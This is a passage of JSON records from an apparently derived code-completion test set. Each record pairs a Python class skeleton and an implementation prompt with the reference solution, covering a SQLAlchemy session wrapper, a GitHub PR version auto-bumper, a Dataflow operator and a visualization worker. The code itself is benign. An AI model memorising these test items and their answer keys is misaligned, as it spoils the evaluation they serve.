logger : logging.Logger The logger object. maker : sqlalchemy.orm.session.Session A session maker.\"\"\"\n\n def __init__(self, session_maker):\n \"\"\"Create a new Session object. Parameter --------- session_maker : Session or sqlalchemy.orm.session.Session The session wrapper to use.\"\"\"\n <|body_0|>\n\n def __call__(self):\n \"\"\"Context handler for the session. This creates a new session and yields it. It will catch, log, and re raise any exceptions that occur. It will also commit and close all sessions. In the case of an error it will rollback the session. Yields ------ session : Session A session that will be closed outside of the context.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.logger = logging.getLogger('core.Session')\n self.maker = session_maker\n if isinstance(session_maker, Session):\n self.maker = session_maker.maker\n<|end_body_0|>\n\n<|body_start_1|>\n session = self.maker()\n try:\n yield session\n session.commit()\n except Skip:\n session.rollback()\n raise\n except Exception:\n self.logger.error('Transaction failed. Rolling back.')\n session.rollback()\n raise\n finally:\n session.close()\n<|end_body_1|>\n", "revision_id": "1982e10a56885e56d79aac69365b9ff78c0e3d92", "skeleton": "<|skeleton|>\nclass Session:\n \"\"\"A wrapper around a session maker to provide the types of logging and rollbacks that we desire. It is callable and works as a context handler to manage sessions when doing so. Attributes ---------- logger : logging.Logger The logger object. maker : sqlalchemy.orm.session.Session A session maker.\"\"\"\n\n def __init__(self, session_maker):\n \"\"\"Create a new Session object. Parameter --------- session_maker : Session or sqlalchemy.orm.session.Session The session wrapper to use.\"\"\"\n <|body_0|>\n\n def __call__(self):\n \"\"\"Context handler for the session. This creates a new session and yields it. It will catch, log, and re raise any exceptions that occur. It will also commit and close all sessions. In the case of an error it will rollback the session. Yields ------ session : Session A session that will be closed outside of the context.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Session:\n \"\"\"A wrapper around a session maker to provide the types of logging and rollbacks that we desire. It is callable and works as a context handler to manage sessions when doing so. Attributes ---------- logger : logging.Logger The logger object. maker : sqlalchemy.orm.session.Session A session maker.\"\"\"\n\n def __init__(self, session_maker):\n \"\"\"Create a new Session object. Parameter --------- session_maker : Session or sqlalchemy.orm.session.Session The session wrapper to use.\"\"\"\n self.logger = logging.getLogger('core.Session')\n self.maker = session_maker\n if isinstance(session_maker, Session):\n self.maker = session_maker.maker\n\n def __call__(self):\n \"\"\"Context handler for the session. This creates a new session and yields it. It will catch, log, and re raise any exceptions that occur. It will also commit and close all sessions. In the case of an error it will rollback the session. Yields ------ session : Session A session that will be closed outside of the context.\"\"\"\n session = self.maker()\n try:\n yield session\n session.commit()\n except Skip:\n session.rollback()\n raise\n except Exception:\n self.logger.error('Transaction failed. Rolling back.')\n session.rollback()\n raise\n finally:\n session.close()\n", "source": "the_stack_v2_python_sparse", "source_path": "pymotifs/core/db.py", "source_repo": "BGSU-RNA/RNA-3D-Hub-core", "split": "test", "star_events_count": 3} {"blob_id": "1c09e2ced8ed33aaf69f92e353bcdee1631818af", "bodies": ["assert packs_to_autobump, f'packs_to_autobump in the pr: {pr.number}, cant be empty.'\nself.pr = pr\nself.branch = pr.head.ref\nself.git_repo = git_repo\nself.packs_to_autobump = packs_to_autobump\nself.github_run_id = run_id", "body = PR_COMMENT_TITLE.format(self.github_run_id)\nwith Checkout(self.git_repo, self.branch):\n for pack_auto_bumper in self.packs_to_autobump:\n pack_auto_bumper.set_pr_changed_rn_related_data()\n self.git_repo.git.merge(f'origin/{BASE}', '-Xtheirs', '-m', MERGE_FROM_MASTER_COMMIT_MESSAGE)\n for pack_auto_bumper in self.packs_to_autobump:\n new_version = pack_auto_bumper.autobump()\n print(f'Pack {pack_auto_bumper.pack_id} new version: {new_version}.')\n self.git_repo.git.add(f'{PACKS_DIR}/{pack_auto_bumper.pack_id}')\n self.git_repo.git.commit('-m', COMMIT_MESSAGE.format(pack_auto_bumper.pack_id, new_version))\n body += PR_COMMENT.format(pack_auto_bumper.pack_id, new_version)\n print(f'[{self.pr.number}] Committed the changes. Commenting on the pr: \\n{body}.\\n')\n body += PR_COMMENT_STOP_AUTOMATION\n self.git_repo.git.push()\n self.pr.create_issue_comment(body)\nreturn body"], "bodies_text": "<|body_start_0|>\n assert packs_to_autobump, f'packs_to_autobump in the pr: {pr.number}, cant be empty.'\n self.pr = pr\n self.branch = pr.head.ref\n self.git_repo = git_repo\n self.packs_to_autobump = packs_to_autobump\n self.github_run_id = run_id\n<|end_body_0|>\n\n<|body_start_1|>\n body = PR_COMMENT_TITLE.format(self.github_run_id)\n with Checkout(self.git_repo, self.branch):\n for pack_auto_bumper in self.packs_to_autobump:\n pack_auto_bumper.set_pr_changed_rn_related_data()\n self.git_repo.git.merge(f'origin/{BASE}', '-Xtheirs', '-m', MERGE_FROM_MASTER_COMMIT_MESSAGE)\n for pack_auto_bumper in self.packs_to_autobump:\n new_version = pack_auto_bumper.autobump()\n print(f'Pack {pack_auto_bumper.pack_id} new version: {new_version}.')\n self.git_repo.git.add(f'{PACKS_DIR}/{pack_auto_bumper.pack_id}')\n self.git_repo.git.commit('-m', COMMIT_MESSAGE.format(pack_auto_bumper.pack_id, new_version))\n body += PR_COMMENT.format(pack_auto_bumper.pack_id, new_version)\n print(f'[{self.pr.number}] Committed the changes. Commenting on the pr: \\n{body}.\\n')\n body += PR_COMMENT_STOP_AUTOMATION\n self.git_repo.git.push()\n self.pr.create_issue_comment(body)\n return body\n<|end_body_1|>\n", "class_docstring": "", "class_name": "BranchAutoBumper", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BranchAutoBumper:\n\n def __init__(self, pr: PullRequest, git_repo: Repo, packs_to_autobump: List[PackAutoBumper], run_id: str):\n \"\"\"Args: pr: Pull Request related to the branch. git_repo: Git API object packs_to_autobump: Pack that was changed in this PR and need to autobump its versions. run_id: GitHub action run id.\"\"\"\n <|body_0|>\n\n def autobump(self):\n \"\"\"AutoBumps version for all relevant packs in the pr: 1. Checkouts the branch and saves pr changed related data. 2. Merges from BASE and accept `theirs` changes. 3. AutoBumps version for each relevant packs. 4. Commit changes for each pack. 5. Comment on the PR. 6. Pushes the changes.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert packs_to_autobump, f'packs_to_autobump in the pr: {pr.number}, cant be empty.'\n self.pr = pr\n self.branch = pr.head.ref\n self.git_repo = git_repo\n self.packs_to_autobump = packs_to_autobump\n self.github_run_id = run_id\n<|end_body_0|>\n\n<|body_start_1|>\n body = PR_COMMENT_TITLE.format(self.github_run_id)\n with Checkout(self.git_repo, self.branch):\n for pack_auto_bumper in self.packs_to_autobump:\n pack_auto_bumper.set_pr_changed_rn_related_data()\n self.git_repo.git.merge(f'origin/{BASE}', '-Xtheirs', '-m', MERGE_FROM_MASTER_COMMIT_MESSAGE)\n for pack_auto_bumper in self.packs_to_autobump:\n new_version = pack_auto_bumper.autobump()\n print(f'Pack {pack_auto_bumper.pack_id} new version: {new_version}.')\n self.git_repo.git.add(f'{PACKS_DIR}/{pack_auto_bumper.pack_id}')\n self.git_repo.git.commit('-m', COMMIT_MESSAGE.format(pack_auto_bumper.pack_id, new_version))\n body += PR_COMMENT.format(pack_auto_bumper.pack_id, new_version)\n print(f'[{self.pr.number}] Committed the changes. Commenting on the pr: \\n{body}.\\n')\n body += PR_COMMENT_STOP_AUTOMATION\n self.git_repo.git.push()\n self.pr.create_issue_comment(body)\n return body\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000146", "length_bytes": 11815, "license_type": "permissive", "methods": [{"docstring": "Args: pr: Pull Request related to the branch. git_repo: Git API object packs_to_autobump: Pack that was changed in this PR and need to autobump its versions. run_id: GitHub action run id.", "name": "__init__", "signature": "def __init__(self, pr: PullRequest, git_repo: Repo, packs_to_autobump: List[PackAutoBumper], run_id: str)"}, {"docstring": "AutoBumps version for all relevant packs in the pr: 1. Checkouts the branch and saves pr changed related data. 2. Merges from BASE and accept `theirs` changes. 3. AutoBumps version for each relevant packs. 4. Commit changes for each pack. 5. Comment on the PR. 6. Pushes the changes.", "name": "autobump", "signature": "def autobump(self)"}], "n_methods": 2, "prompt": "Implement the Python class `BranchAutoBumper` described below.\n\nClass description:\nImplement the BranchAutoBumper class.\n\nMethod signatures and docstrings:\n- def __init__(self, pr: PullRequest, git_repo: Repo, packs_to_autobump: List[PackAutoBumper], run_id: str): Args: pr: Pull Request related to the branch. git_repo: Git API object packs_to_autobump: Pack that was changed in this PR and need to autobump its versions. run_id: GitHub action run id.\n- def autobump(self): AutoBumps version for all relevant packs in the pr: 1. Checkouts the branch and saves pr changed related data. 2. Merges from BASE and accept `theirs` changes. 3. AutoBumps version for each relevant packs. 4. Commit changes for each pack. 5. Comment on the PR. 6. Pushes the changes.", "prompted_full_text": "Implement the Python class `BranchAutoBumper` described below.\n\nClass description:\nImplement the BranchAutoBumper class.\n\nMethod signatures and docstrings:\n- def __init__(self, pr: PullRequest, git_repo: Repo, packs_to_autobump: List[PackAutoBumper], run_id: str): Args: pr: Pull Request related to the branch. git_repo: Git API object packs_to_autobump: Pack that was changed in this PR and need to autobump its versions. run_id: GitHub action run id.\n- def autobump(self): AutoBumps version for all relevant packs in the pr: 1. Checkouts the branch and saves pr changed related data. 2. Merges from BASE and accept `theirs` changes. 3. AutoBumps version for each relevant packs. 4. Commit changes for each pack. 5. Comment on the PR. 6. Pushes the changes.\n\n<|skeleton|>\nclass BranchAutoBumper:\n\n def __init__(self, pr: PullRequest, git_repo: Repo, packs_to_autobump: List[PackAutoBumper], run_id: str):\n \"\"\"Args: pr: Pull Request related to the branch. git_repo: Git API object packs_to_autobump: Pack that was changed in this PR and need to autobump its versions. run_id: GitHub action run id.\"\"\"\n <|body_0|>\n\n def autobump(self):\n \"\"\"AutoBumps version for all relevant packs in the pr: 1. Checkouts the branch and saves pr changed related data. 2. Merges from BASE and accept `theirs` changes. 3. AutoBumps version for each relevant packs. 4. Commit changes for each pack. 5. Comment on the PR. 6. Pushes the changes.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert packs_to_autobump, f'packs_to_autobump in the pr: {pr.number}, cant be empty.'\n self.pr = pr\n self.branch = pr.head.ref\n self.git_repo = git_repo\n self.packs_to_autobump = packs_to_autobump\n self.github_run_id = run_id\n<|end_body_0|>\n\n<|body_start_1|>\n body = PR_COMMENT_TITLE.format(self.github_run_id)\n with Checkout(self.git_repo, self.branch):\n for pack_auto_bumper in self.packs_to_autobump:\n pack_auto_bumper.set_pr_changed_rn_related_data()\n self.git_repo.git.merge(f'origin/{BASE}', '-Xtheirs', '-m', MERGE_FROM_MASTER_COMMIT_MESSAGE)\n for pack_auto_bumper in self.packs_to_autobump:\n new_version = pack_auto_bumper.autobump()\n print(f'Pack {pack_auto_bumper.pack_id} new version: {new_version}.')\n self.git_repo.git.add(f'{PACKS_DIR}/{pack_auto_bumper.pack_id}')\n self.git_repo.git.commit('-m', COMMIT_MESSAGE.format(pack_auto_bumper.pack_id, new_version))\n body += PR_COMMENT.format(pack_auto_bumper.pack_id, new_version)\n print(f'[{self.pr.number}] Committed the changes. Commenting on the pr: \\n{body}.\\n')\n body += PR_COMMENT_STOP_AUTOMATION\n self.git_repo.git.push()\n self.pr.create_issue_comment(body)\n return body\n<|end_body_1|>\n", "revision_id": "890def5a0e0ae8d6eaa538148249ddbc851dbb6b", "skeleton": "<|skeleton|>\nclass BranchAutoBumper:\n\n def __init__(self, pr: PullRequest, git_repo: Repo, packs_to_autobump: List[PackAutoBumper], run_id: str):\n \"\"\"Args: pr: Pull Request related to the branch. git_repo: Git API object packs_to_autobump: Pack that was changed in this PR and need to autobump its versions. run_id: GitHub action run id.\"\"\"\n <|body_0|>\n\n def autobump(self):\n \"\"\"AutoBumps version for all relevant packs in the pr: 1. Checkouts the branch and saves pr changed related data. 2. Merges from BASE and accept `theirs` changes. 3. AutoBumps version for each relevant packs. 4. Commit changes for each pack. 5. Comment on the PR. 6. Pushes the changes.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BranchAutoBumper:\n def __init__(self, pr: PullRequest, git_repo: Repo, packs_to_autobump: List[PackAutoBumper], run_id: str):\n \"\"\"Args: pr: Pull Request related to the branch. git_repo: Git API object packs_to_autobump: Pack that was changed in this PR and need to autobump its versions. run_id: GitHub action run id.\"\"\"\n assert packs_to_autobump, f'packs_to_autobump in the pr: {pr.number}, cant be empty.'\n self.pr = pr\n self.branch = pr.head.ref\n self.git_repo = git_repo\n self.packs_to_autobump = packs_to_autobump\n self.github_run_id = run_id\n\n def autobump(self):\n \"\"\"AutoBumps version for all relevant packs in the pr: 1. Checkouts the branch and saves pr changed related data. 2. Merges from BASE and accept `theirs` changes. 3. AutoBumps version for each relevant packs. 4. Commit changes for each pack. 5. Comment on the PR. 6. Pushes the changes.\"\"\"\n body = PR_COMMENT_TITLE.format(self.github_run_id)\n with Checkout(self.git_repo, self.branch):\n for pack_auto_bumper in self.packs_to_autobump:\n pack_auto_bumper.set_pr_changed_rn_related_data()\n self.git_repo.git.merge(f'origin/{BASE}', '-Xtheirs', '-m', MERGE_FROM_MASTER_COMMIT_MESSAGE)\n for pack_auto_bumper in self.packs_to_autobump:\n new_version = pack_auto_bumper.autobump()\n print(f'Pack {pack_auto_bumper.pack_id} new version: {new_version}.')\n self.git_repo.git.add(f'{PACKS_DIR}/{pack_auto_bumper.pack_id}')\n self.git_repo.git.commit('-m', COMMIT_MESSAGE.format(pack_auto_bumper.pack_id, new_version))\n body += PR_COMMENT.format(pack_auto_bumper.pack_id, new_version)\n print(f'[{self.pr.number}] Committed the changes. Commenting on the pr: \\n{body}.\\n')\n body += PR_COMMENT_STOP_AUTOMATION\n self.git_repo.git.push()\n self.pr.create_issue_comment(body)\n return body\n", "source": "the_stack_v2_python_sparse", "source_path": "Utils/github_workflow_scripts/autobump_release_notes/autobump_rn.py", "source_repo": "demisto/content", "split": "test", "star_events_count": 1023} {"blob_id": "1ab7dcae5997e06b05eecfc318af2c4b1b7d72dd", "bodies": ["old_pypath = os.environ.get('PYTHONPATH', '')\nif not old_pypath:\n pypath = python_path\nelif python_path in old_pypath:\n pypath = old_pypath\nelse:\n pypath = old_pypath + ':' + python_path\nos.environ['PYTHONPATH'] = pypath\nself.dataflow_hook = dataflow_hook\nsuper().__init__(**kwargs)", "bucket_helper = dataflow_operator.GoogleCloudBucketHelper(self.gcp_conn_id, self.delegate_to)\nself.py_file = bucket_helper.google_cloud_to_local(self.py_file)\nif self.dataflow_hook is None:\n self.dataflow_hook = dataflow_py3_hook.DataFlowHook(gcp_conn_id=self.gcp_conn_id, delegate_to=self.delegate_to, poll_sleep=self.poll_sleep)\ndataflow_options = self.dataflow_default_options.copy()\ndataflow_options.update(self.options)\nformatted_options = {_camel_to_snake(key): dataflow_options[key] for key in dataflow_options}\nself.dataflow_hook.start_python_dataflow(self.task_id, formatted_options, self.py_file, self.py_options)"], "bodies_text": "<|body_start_0|>\n old_pypath = os.environ.get('PYTHONPATH', '')\n if not old_pypath:\n pypath = python_path\n elif python_path in old_pypath:\n pypath = old_pypath\n else:\n pypath = old_pypath + ':' + python_path\n os.environ['PYTHONPATH'] = pypath\n self.dataflow_hook = dataflow_hook\n super().__init__(**kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n bucket_helper = dataflow_operator.GoogleCloudBucketHelper(self.gcp_conn_id, self.delegate_to)\n self.py_file = bucket_helper.google_cloud_to_local(self.py_file)\n if self.dataflow_hook is None:\n self.dataflow_hook = dataflow_py3_hook.DataFlowHook(gcp_conn_id=self.gcp_conn_id, delegate_to=self.delegate_to, poll_sleep=self.poll_sleep)\n dataflow_options = self.dataflow_default_options.copy()\n dataflow_options.update(self.options)\n formatted_options = {_camel_to_snake(key): dataflow_options[key] for key in dataflow_options}\n self.dataflow_hook.start_python_dataflow(self.task_id, formatted_options, self.py_file, self.py_options)\n<|end_body_1|>\n", "class_docstring": "A Dataflow Operator to run py3 jobs. This operator patches `dataflow_operator.DataFlowPythonOperator` and call `dataflow_py3_hook.DataFlowHook` to start DataFlow jobs in python 3.", "class_name": "DataFlowPythonOperator", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DataFlowPythonOperator:\n \"\"\"A Dataflow Operator to run py3 jobs. This operator patches `dataflow_operator.DataFlowPythonOperator` and call `dataflow_py3_hook.DataFlowHook` to start DataFlow jobs in python 3.\"\"\"\n\n def __init__(self, python_path='', dataflow_hook=None, **kwargs):\n \"\"\"Constructor. Args: python_path: Set PYTHONPATH to include this path before calling DataFlow. dataflow_hook: The DataFlow hook to use. If none, will automatically create. **kwargs: Additional args for super class.\"\"\"\n <|body_0|>\n\n def execute(self, context):\n \"\"\"Execute the python dataflow job.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n old_pypath = os.environ.get('PYTHONPATH', '')\n if not old_pypath:\n pypath = python_path\n elif python_path in old_pypath:\n pypath = old_pypath\n else:\n pypath = old_pypath + ':' + python_path\n os.environ['PYTHONPATH'] = pypath\n self.dataflow_hook = dataflow_hook\n super().__init__(**kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n bucket_helper = dataflow_operator.GoogleCloudBucketHelper(self.gcp_conn_id, self.delegate_to)\n self.py_file = bucket_helper.google_cloud_to_local(self.py_file)\n if self.dataflow_hook is None:\n self.dataflow_hook = dataflow_py3_hook.DataFlowHook(gcp_conn_id=self.gcp_conn_id, delegate_to=self.delegate_to, poll_sleep=self.poll_sleep)\n dataflow_options = self.dataflow_default_options.copy()\n dataflow_options.update(self.options)\n formatted_options = {_camel_to_snake(key): dataflow_options[key] for key in dataflow_options}\n self.dataflow_hook.start_python_dataflow(self.task_id, formatted_options, self.py_file, self.py_options)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000147", "length_bytes": 3015, "license_type": "permissive", "methods": [{"docstring": "Constructor. Args: python_path: Set PYTHONPATH to include this path before calling DataFlow. dataflow_hook: The DataFlow hook to use. If none, will automatically create. **kwargs: Additional args for super class.", "name": "__init__", "signature": "def __init__(self, python_path='', dataflow_hook=None, **kwargs)"}, {"docstring": "Execute the python dataflow job.", "name": "execute", "signature": "def execute(self, context)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005952", "prompt": "Implement the Python class `DataFlowPythonOperator` described below.\n\nClass description:\nA Dataflow Operator to run py3 jobs. This operator patches `dataflow_operator.DataFlowPythonOperator` and call `dataflow_py3_hook.DataFlowHook` to start DataFlow jobs in python 3.\n\nMethod signatures and docstrings:\n- def __init__(self, python_path='', dataflow_hook=None, **kwargs): Constructor. Args: python_path: Set PYTHONPATH to include this path before calling DataFlow. dataflow_hook: The DataFlow hook to use. If none, will automatically create. **kwargs: Additional args for super class.\n- def execute(self, context): Execute the python dataflow job.", "prompted_full_text": "Implement the Python class `DataFlowPythonOperator` described below.\n\nClass description:\nA Dataflow Operator to run py3 jobs. This operator patches `dataflow_operator.DataFlowPythonOperator` and call `dataflow_py3_hook.DataFlowHook` to start DataFlow jobs in python 3.\n\nMethod signatures and docstrings:\n- def __init__(self, python_path='', dataflow_hook=None, **kwargs): Constructor. Args: python_path: Set PYTHONPATH to include this path before calling DataFlow. dataflow_hook: The DataFlow hook to use. If none, will automatically create. **kwargs: Additional args for super class.\n- def execute(self, context): Execute the python dataflow job.\n\n<|skeleton|>\nclass DataFlowPythonOperator:\n \"\"\"A Dataflow Operator to run py3 jobs. This operator patches `dataflow_operator.DataFlowPythonOperator` and call `dataflow_py3_hook.DataFlowHook` to start DataFlow jobs in python 3.\"\"\"\n\n def __init__(self, python_path='', dataflow_hook=None, **kwargs):\n \"\"\"Constructor. Args: python_path: Set PYTHONPATH to include this path before calling DataFlow. dataflow_hook: The DataFlow hook to use. If none, will automatically create. **kwargs: Additional args for super class.\"\"\"\n <|body_0|>\n\n def execute(self, context):\n \"\"\"Execute the python dataflow job.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n old_pypath = os.environ.get('PYTHONPATH', '')\n if not old_pypath:\n pypath = python_path\n elif python_path in old_pypath:\n pypath = old_pypath\n else:\n pypath = old_pypath + ':' + python_path\n os.environ['PYTHONPATH'] = pypath\n self.dataflow_hook = dataflow_hook\n super().__init__(**kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n bucket_helper = dataflow_operator.GoogleCloudBucketHelper(self.gcp_conn_id, self.delegate_to)\n self.py_file = bucket_helper.google_cloud_to_local(self.py_file)\n if self.dataflow_hook is None:\n self.dataflow_hook = dataflow_py3_hook.DataFlowHook(gcp_conn_id=self.gcp_conn_id, delegate_to=self.delegate_to, poll_sleep=self.poll_sleep)\n dataflow_options = self.dataflow_default_options.copy()\n dataflow_options.update(self.options)\n formatted_options = {_camel_to_snake(key): dataflow_options[key] for key in dataflow_options}\n self.dataflow_hook.start_python_dataflow(self.task_id, formatted_options, self.py_file, self.py_options)\n<|end_body_1|>\n", "revision_id": "29b40262cf0bb5ef39b91765a074fe76fc2c8e03", "skeleton": "<|skeleton|>\nclass DataFlowPythonOperator:\n \"\"\"A Dataflow Operator to run py3 jobs. This operator patches `dataflow_operator.DataFlowPythonOperator` and call `dataflow_py3_hook.DataFlowHook` to start DataFlow jobs in python 3.\"\"\"\n\n def __init__(self, python_path='', dataflow_hook=None, **kwargs):\n \"\"\"Constructor. Args: python_path: Set PYTHONPATH to include this path before calling DataFlow. dataflow_hook: The DataFlow hook to use. If none, will automatically create. **kwargs: Additional args for super class.\"\"\"\n <|body_0|>\n\n def execute(self, context):\n \"\"\"Execute the python dataflow job.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DataFlowPythonOperator:\n \"\"\"A Dataflow Operator to run py3 jobs. This operator patches `dataflow_operator.DataFlowPythonOperator` and call `dataflow_py3_hook.DataFlowHook` to start DataFlow jobs in python 3.\"\"\"\n\n def __init__(self, python_path='', dataflow_hook=None, **kwargs):\n \"\"\"Constructor. Args: python_path: Set PYTHONPATH to include this path before calling DataFlow. dataflow_hook: The DataFlow hook to use. If none, will automatically create. **kwargs: Additional args for super class.\"\"\"\n old_pypath = os.environ.get('PYTHONPATH', '')\n if not old_pypath:\n pypath = python_path\n elif python_path in old_pypath:\n pypath = old_pypath\n else:\n pypath = old_pypath + ':' + python_path\n os.environ['PYTHONPATH'] = pypath\n self.dataflow_hook = dataflow_hook\n super().__init__(**kwargs)\n\n def execute(self, context):\n \"\"\"Execute the python dataflow job.\"\"\"\n bucket_helper = dataflow_operator.GoogleCloudBucketHelper(self.gcp_conn_id, self.delegate_to)\n self.py_file = bucket_helper.google_cloud_to_local(self.py_file)\n if self.dataflow_hook is None:\n self.dataflow_hook = dataflow_py3_hook.DataFlowHook(gcp_conn_id=self.gcp_conn_id, delegate_to=self.delegate_to, poll_sleep=self.poll_sleep)\n dataflow_options = self.dataflow_default_options.copy()\n dataflow_options.update(self.options)\n formatted_options = {_camel_to_snake(key): dataflow_options[key] for key in dataflow_options}\n self.dataflow_hook.start_python_dataflow(self.task_id, formatted_options, self.py_file, self.py_options)\n", "source": "the_stack_v2_python_sparse", "source_path": "contrib/plugins/operators/dataflow_py3_operator.py", "source_repo": "Ressmann/driblet", "split": "test", "star_events_count": 0} {"blob_id": "d0622ec9a9fb891ae2c9a0a875e3f0e5666725ed", "bodies": ["self.video_vis = video_vis\nself.task_queue = task_queue\nself.result_queue = result_queue\nsuper().__init__()", "while True:\n task = self.task_queue.get()\n if isinstance(task, _StopToken):\n break\n frames = draw_predictions(task, self.video_vis)\n task.frames = np.array(frames)\n self.result_queue.put(task)"], "bodies_text": "<|body_start_0|>\n self.video_vis = video_vis\n self.task_queue = task_queue\n self.result_queue = result_queue\n super().__init__()\n<|end_body_0|>\n\n<|body_start_1|>\n while True:\n task = self.task_queue.get()\n if isinstance(task, _StopToken):\n break\n frames = draw_predictions(task, self.video_vis)\n task.frames = np.array(frames)\n self.result_queue.put(task)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "_VisWorker", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass _VisWorker:\n\n def __init__(self, video_vis, task_queue, result_queue):\n \"\"\"Visualization Worker for AsyncVis. Args: video_vis (VideoVisualizer object): object with tools for visualization. task_queue (mp.Queue): a shared queue for incoming task for visualization. result_queue (mp.Queue): a shared queue for visualized results.\"\"\"\n <|body_0|>\n\n def run(self):\n \"\"\"Run visualization asynchronously.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.video_vis = video_vis\n self.task_queue = task_queue\n self.result_queue = result_queue\n super().__init__()\n<|end_body_0|>\n\n<|body_start_1|>\n while True:\n task = self.task_queue.get()\n if isinstance(task, _StopToken):\n break\n frames = draw_predictions(task, self.video_vis)\n task.frames = np.array(frames)\n self.result_queue.put(task)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000148", "length_bytes": 9808, "license_type": "permissive", "methods": [{"docstring": "Visualization Worker for AsyncVis. Args: video_vis (VideoVisualizer object): object with tools for visualization. task_queue (mp.Queue): a shared queue for incoming task for visualization. result_queue (mp.Queue): a shared queue for visualized results.", "name": "__init__", "signature": "def __init__(self, video_vis, task_queue, result_queue)"}, {"docstring": "Run visualization asynchronously.", "name": "run", "signature": "def run(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006655", "prompt": "Implement the Python class `_VisWorker` described below.\n\nClass description:\nImplement the _VisWorker class.\n\nMethod signatures and docstrings:\n- def __init__(self, video_vis, task_queue, result_queue): Visualization Worker for AsyncVis. Args: video_vis (VideoVisualizer object): object with tools for visualization. task_queue (mp.Queue): a shared queue for incoming task for visualization. result_queue (mp.Queue): a shared queue for visualized results.\n- def run(self): Run visualization asynchronously.", "prompted_full_text": "Implement the Python class `_VisWorker` described below.\n\nClass description:\nImplement the _VisWorker class.\n\nMethod signatures and docstrings:\n- def __init__(self, video_vis, task_queue, result_queue): Visualization Worker for AsyncVis. Args: video_vis (VideoVisualizer object): object with tools for visualization. task_queue (mp.Queue): a shared queue for incoming task for visualization. result_queue (mp.Queue): a shared queue for visualized results.\n- def run(self): Run visualization asynchronously.\n\n<|skeleton|>\nclass _VisWorker:\n\n def __init__(self, video_vis, task_queue, result_queue):\n \"\"\"Visualization Worker for AsyncVis. Args: video_vis (VideoVisualizer object): object with tools for visualization. task_queue (mp.Queue): a shared queue for incoming task for visualization. result_queue (mp.Queue): a shared queue for visualized results.\"\"\"\n <|body_0|>\n\n def run(self):\n \"\"\"Run visualization asynchronously.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.video_vis = video_vis\n self.task_queue = task_queue\n self.result_queue = result_queue\n super().__init__()\n<|end_body_0|>\n\n<|body_start_1|>\n while True:\n task = self.task_queue.get()\n if isinstance(task, _StopToken):\n break\n frames = draw_predictions(task, self.video_vis)\n task.frames = np.array(frames)\n self.result_queue.put(task)\n<|end_body_1|>\n", "revision_id": "6092dad7be32bb1d6b71fe1bade258dc8b492fe3", "skeleton": "<|skeleton|>\nclass _VisWorker:\n\n def __init__(self, video_vis, task_queue, result_queue):\n \"\"\"Visualization Worker for AsyncVis. Args: video_vis (VideoVisualizer object): object with tools for visualization. task_queue (mp.Queue): a shared queue for incoming task for visualization. result_queue (mp.Queue): a shared queue for visualized results.\"\"\"\n <|body_0|>\n\n def run(self):\n \"\"\"Run visualization asynchronously.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class _VisWorker:\n def __init__(self, video_vis, task_queue, result_queue):\n \"\"\"Visualization Worker for AsyncVis. Args: video_vis (VideoVisualizer object): object with tools for visualization. task_queue (mp.Queue): a shared queue for incoming task for visualization. result_queue (mp.Queue): a shared queue for visualized results.\"\"\"\n self.video_vis = video_vis\n self.task_queue = task_queue\n self.result_queue = result_queue\n super().__init__()\n\n def run(self):\n \"\"\"Run visualization asynchronously.\"\"\"\n while True:\n task = self.task_queue.get()\n if isinstance(task, _StopToken):\n break\n frames = draw_predictions(task, self.video_vis)\n task.frames = np.array(frames)\n self.result_queue.put(task)\n", "source": "the_stack_v2_python_sparse", "source_path": "slowfast/visualization/async_predictor.py", "source_repo": "facebookresearch/SlowFast", "split": "test", "star_events_count": 6221} {"blob_id": "1f8a744a0c5495ded77df7737fd33081dcbf90e7", "bodies": ["filing_effective_date = filing_effective_date.replace(tzinfo=None)\nregistrar = [x for x in RegistrarInfo.registrar_info if filing_effective_date >= datetime.datetime.strptime(x['startDate'], '%Y-%m-%dT%H:%M:%S') and (x['endDate'] is None or filing_effective_date <= datetime.datetime.strptime(x['endDate'], '%Y-%m-%dT%H:%M:%S'))][0]\nsignature = RegistrarInfo.encode_registrar_signature(registrar['signatureImage'])\nregistrar['signature'] = f'data:image/png;base64,{signature}'\nif registrar['signatureImageAndText']:\n signature_and_text = RegistrarInfo.encode_registrar_signature(registrar['signatureImageAndText'])\n registrar['signatureAndText'] = f'data:image/png;base64,{signature_and_text}'\nreturn registrar", "template_path = current_app.config.get('REPORT_TEMPLATE_PATH')\nimage_path = f'{template_path}/registrar_signatures/{signature_image}'\nwith open(image_path, 'rb') as image_file:\n encoded_string = base64.b64encode(image_file.read())\n return 